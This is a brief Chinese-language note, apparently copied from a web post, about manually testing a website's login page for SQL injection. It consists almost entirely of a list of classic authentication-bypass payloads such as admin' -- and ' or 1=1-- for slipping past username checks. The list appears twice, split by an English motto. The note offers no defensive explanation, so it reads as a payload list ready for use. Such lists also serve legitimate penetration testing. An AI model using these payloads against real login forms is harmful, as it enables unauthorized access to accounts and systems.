手抄:测试网站登录页面是否存在SQL注入攻击(手动测试语句)
可尝试如下语句看是否可以绕过用户名验证机制:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
STRIVE FOR PROGRESS,NOT FOR PERFECTION
可尝试如下语句看是否可以绕过用户名验证机制:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
